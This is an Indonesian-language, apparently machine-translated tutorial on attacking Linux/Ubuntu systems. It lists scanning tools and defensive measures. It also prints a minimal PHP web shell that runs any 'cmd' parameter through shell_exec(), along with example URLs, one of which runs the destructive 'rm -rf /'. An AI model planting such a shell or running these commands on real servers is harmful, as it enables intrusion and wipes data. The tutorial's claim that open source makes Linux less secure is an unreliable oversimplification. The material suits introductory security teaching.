Meretas OS Linux: Meretas dengan Ubuntu (Tutorial Perintah)

Linux adalah sistem operasi server yang paling banyak digunakan, terutama untuk server web. Ini adalah sumber terbuka; ini berarti siapa pun dapat memiliki akses ke kode sumber. Hal ini membuatnya kurang aman dibandingkan dengan sistem operasi lain karena penyerang dapat mempelajari kode sumber untuk menemukan kerentanan. Linux for Hackers adalah tentang mengeksploitasi kerentanan ini untuk mendapatkan akses tidak sah ke suatu sistem.

Pada artikel ini, kami akan memperkenalkan Anda tentang apa itu Linux, kerentanan keamanannya, dan peretasannya Ubuntu dan tindakan balasan yang dapat Anda terapkan.

Catatan Singkat di Linux

Linux adalah sistem operasi open sourceAda banyak distribusi sistem operasi berbasis Linux seperti Redhat, Fedora, dan Ubuntu, dll. Tidak seperti sistem operasi lain, Linux kurang aman dalam hal keamanan. Hal ini karena kode sumbernya tersedia secara bebas, sehingga mudah untuk mempelajari kerentanannya dan mengeksploitasinya dibandingkan dengan sistem operasi lain yang bukan sumber terbuka. Linux dapat digunakan sebagai sistem operasi server, desktop, tablet, atau perangkat seluler.

Program Linux dapat dioperasikan menggunakan GUI atau perintah. Perintah Linux untuk Kali Linux hacking lebih efektif dan efisien dibandingkan dengan menggunakan GUI. Untuk alasan ini, mengetahui perintah dasar Linux untuk peretasan akan membantu.

Lihat tutorial ini https://www.guru99.com/unix-linux-tutorial.html tentang cara memulainya Kali Linux retas.

Alat Peretasan Linux

  • Nessus– alat ini dapat digunakan untuk Ubuntu hack, scan pengaturan konfigurasi, patch, dan jaringan dll. dapat ditemukan di https://www.tenable.com/products/nessus
  • peta N. Alat ini dapat digunakan untuk memantau host yang berjalan di server dan layanan yang digunakannya. Itu juga dapat digunakan untuk memindai port. Itu dapat ditemukan di https://nmap.org/
  • SARA – SARA adalah singkatan dari Asisten Peneliti Auditor Keamanan. Sesuai dengan namanya, alat ini dapat digunakan untuk mengaudit jaringan terhadap ancaman seperti SQL Injection, XSS dll. dapat ditemukan di http://www-arc.com/sara/sara.html

Daftar di atas tidaklah lengkap; ini memberi Anda gambaran tentang alat yang tersedia Ubuntu meretas dan meretas sistem Linux.

Bagaimana mencegah peretasan Linux

Peretasan Linux memanfaatkan kelemahan dalam sistem operasi. Suatu organisasi dapat mengadopsi kebijakan berikut untuk melindungi dirinya dari serangan semacam itu.

  • Manajemen tambalan– patch memperbaiki bug yang dieksploitasi penyerang untuk menyusupi sistem. Kebijakan manajemen patch yang baik akan memastikan bahwa Anda terus-menerus menerapkan patch yang relevan pada sistem Anda.
  • Konfigurasi OS yang tepat– eksploitasi lainnya memanfaatkan kelemahan dalam konfigurasi server. Nama pengguna dan daemon yang tidak aktif harus dinonaktifkan. Pengaturan default seperti kata sandi umum untuk aplikasi, nama pengguna default, dan beberapa nomor port harus diubah.
  • Sistem pendeteksi intrusi– alat tersebut dapat digunakan untuk mendeteksi akses tidak sah ke sistem. Beberapa alat memiliki kemampuan untuk mendeteksi dan mencegah serangan tersebut.

Aktivitas Peretasan: Meretas a Ubuntu Sistem Linux menggunakan PHP

Dalam skenario praktis ini, kita akan belajar cara meretas Ubuntu dan kami akan memberi Anda informasi dasar tentang bagaimana Anda dapat menggunakannya PHP untuk mengkompromikan Linux. Kami tidak akan menargetkan korban mana pun. Jika Anda ingin mencobanya, Anda dapat menginstal LAMPP di mesin lokal Anda.

PHP hadir dengan dua fungsi yang dapat digunakan untuk menjalankan perintah peretasan Linux. Ia memiliki fungsi exec() dan shell_exec(). Fungsi exec() mengembalikan baris terakhir dari keluaran perintah sedangkan shell_exec() mengembalikan seluruh hasil perintah sebagai string.

Untuk tujuan demonstrasi, mari kita asumsikan penyerang berhasil mengunggah berkas berikut di server web.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

SINI,

Script di atas mendapat perintah dari variabel GET bernama cmd. Perintah dijalankan menggunakan shell_exec() dan hasilnya dikembalikan di browser.

Kode di atas dapat dieksploitasi menggunakan URL berikut

http://localhost/cp/konsole.php?cmd=ls%20-l

SINI,

  • “…konsole.php?cmd=ls%20-l”memberikan nilai ls –l ke variabel cmd.

Perintah di Ubuntu untuk meretas server akan dieksekusi sebagai

shell_exec('ls -l') ;

Menjalankan kode di atas pada server web akan memberikan hasil serupa dengan berikut ini.

Meretas a Ubuntu Sistem Linux menggunakan PHP

Perintah di atas hanya menampilkan file di direktori saat ini dan izinnya

Misalkan penyerang meneruskan perintah berikut

rm -rf /

SINI,

  • "rm" menghapus file
  • “rf” membuat perintah rm dijalankan dalam mode rekursif. Menghapus semua folder dan file
  • “/” memerintahkan perintah untuk mulai menghapus file dari direktori root

URL serangannya akan terlihat seperti ini

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Ringkasan

  • Linux adalah sistem operasi yang populer untuk server, desktop, tablet, dan perangkat seluler.
  • Linux bersifat open source, dan kode sumbernya dapat diperoleh oleh siapa saja. Hal ini memudahkan untuk menemukan kerentanan. Ini adalah salah satu OS terbaik untuk peretas.
  • Perintah peretasan dasar dan jaringan masuk Ubuntu sangat berharga bagi peretas Linux.
  • Kerentanan adalah kelemahan yang dapat dieksploitasi untuk membahayakan suatu sistem.
  • Keamanan yang baik dapat membantu melindungi sistem agar tidak disusupi oleh penyerang.